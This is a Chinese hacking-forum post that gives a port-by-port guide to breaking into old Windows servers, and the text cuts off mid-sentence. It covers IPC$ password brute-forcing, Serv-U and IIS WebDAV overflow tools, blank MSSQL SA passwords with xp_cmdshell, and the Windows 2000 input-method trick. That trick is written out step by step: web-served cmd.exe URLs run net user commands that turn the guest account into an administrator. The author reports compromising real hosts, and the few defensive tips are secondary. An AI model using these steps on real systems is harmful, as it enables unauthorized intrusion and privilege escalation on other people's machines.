找回密码
 加入网盟
分割线
官方精品推荐

闭ipc$和默认共享依赖的服务:lanmanserver即server服务

  控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
  4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等)
  5设置复杂密码,防止通过ipc$穷举密码
  除了IPC$,我们还可以利用例如SMBCRACK通过暴力猜解管理员口令,如果对方未打补丁,我 们还可以利用各种RPC漏洞(就是冲击波、震荡波用的那些漏洞),通过各种溢出程序, 来得到权限提升(原理和病毒感染的原理是一样的)。
 21:Serv-u入侵(未测试使用)
  Serv-u是常用的FTP SERVER端软件的一种,因为常用,所以被研究出的漏洞也不少,如果对 端开放了21端口,并且采用Seru-U来架站的话,可以查看一下对端的版本。对5. 004及以下 系统,可用溢出入侵。(serv5004.exe)对5.1.0.0及以下系统,有一个本地提升权限的漏 洞。(servlocal.exe)
  Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户 的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、 本地系统上以FTP系统管理员权限来执行任意命令。
  80:曾经的神话“WEBDAV”(使用情况,成功溢出4台主机,并登陆其中一台,其他3台的 IIS重启)
  微软的IIS功能强大,但遗憾的是同样漏洞多多,如果IIS不打补丁到SP3的话,那么就有一 个著名的WEBDAV漏洞。
  Webdav漏洞说明:
  Microsoft Windows 2000 支持“万维网分布式创作和版本控制 (WebDAV)”协议。RFC 2518 中定义的 WebDAV 是超文本传输协议 (HTTP) 的一组扩展,为 Internet 上计算aIIS 服务 (默认情况下在 LocalSystem 上下文中运行)的安全上下文中运行。 尽管 Microsoft 已 为此弱点提供了修补程序并建议客户立即安装该修补程序,但还是提供了其他的工具和预防 措施,客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利 用。
  可以使用扫描器:Webdavscan(是一个专门用于检测IIS 5.0 服务器是否提供了对WebDAV的 支持的扫描器)来查找网络中存在WEBDAV漏洞的主机,并用溢出程序:wdx.exe来进行攻击 当溢出成功后,就可以使用telnet或者是nc等连接到目标主机的7788端口。
 如:telnet 127.0.0.1 7788
  如果正常的话,将出现以下提示:
  Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>
  OK!
  如何防御:
  1. 搜索注册表中的如下键:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
  增加如下注册表键值:
  value name: DisableWebDAV
  Data type: DWORD
  value data: 1
  2. 使用MS提供的专用补丁!
  1433:Microsoft SQL的SA空口令(扫描到4台,成功登陆其中3台)
  微软的MSSQL7.0以下的版本在默认安装时其SA(System Administrator)口令为空,所开端口 为1433,这个漏洞很早了,但直到现在我们依然可以扫描到很多空口令的SA。更为“搞笑” 的是,微软为了能够让SQL管理员管理方便,还设计了一个xp_cmdshell来执行各种相关命令 。一个入侵者只需要使用一个MS SQL客户端与SA口令为空的服务器连接就可以获得System的 权限,并可以在目标主机上执行任意命令。
  攻击方式,利用“流光”或其他扫描工具可以扫描、破解SA口令,破解成功后可以使用SQL 客户端(如SQLEXEC)连接,并获得系统权限。
  解决办法:
  更改SA管理用户口令;
  删除XP_CMDSHELL命令。(但并不保险,因为如果拥有SA权限,还是可能恢复该命令的)
  3389:3389输入法漏洞(不太可能存在了,但可以猜解管理员用户口令)
  Microsoft Windows 2000 Server及以上版本在安装服务器时,其中有一项是超级终端服务 ,该服务可以使用户通过图形界面象管理本地计算机一样控制远程计算机(因此成为众多攻 击者的最爱)。该服务所开放的端口号为3389,是微软为了方便用户远程管理而设。但是中 文Windows 2000存在有输入漏洞,其漏洞就是用户在登录Windows 2000时,利用输入法的帮 助文件可以获得Administrators组权限。
1、用终端客户端程序进行连接;
  2、按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰, 就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
  3、在\"选项\"菜单上点右键--->跳转到URL\",输入:c:\\winnt\\system32\\cmd.exe.( 如果不能确定NT系统目录,则输入:c:\\ 或d:\\ ……进行查找确定);
  4、选择\"保存到磁盘\" 选择目录:c:\\inetpub\\s\\,因实际上是对方服务器上文件自身 的复制操作,所以这个过程很快就会完成;
  5、打开IE,输入:http://ip/s/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就 完成了第一步;
  6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat
  7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat
  8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add
  guest>>go.bat
  9、http://ip/s/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
  net user guest /active:yes
  net user guest elise
  net localgroup administrators /add guest
  10、在\"选项\"菜单上点右键--->跳转到URL\",输入:c:\\inetpub\\s\\go.bat --->在磁 盘当前位置执行;
  11、OK,.这样我们就激活了服务器的geust帐户,密码为:elise,超级用户!
  注意事项:
  当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但 如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映 象,你的ip及机器名,并能发消息给你!
 1.在IE下,所拥有的只是iusr_m
分享至 : QQ空间
收藏

2 个回复

倒序浏览
8mov电影 11 2010-12-13 11:02:56
2#
有什么作用的啊
回复 使用道具 举报
痕迹 8 2010-12-14 13:51:10
3#
回复 2# 8mov电影


    入        侵准备
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 加入网盟
关闭

华夏网盟推荐 上一条 /1 下一条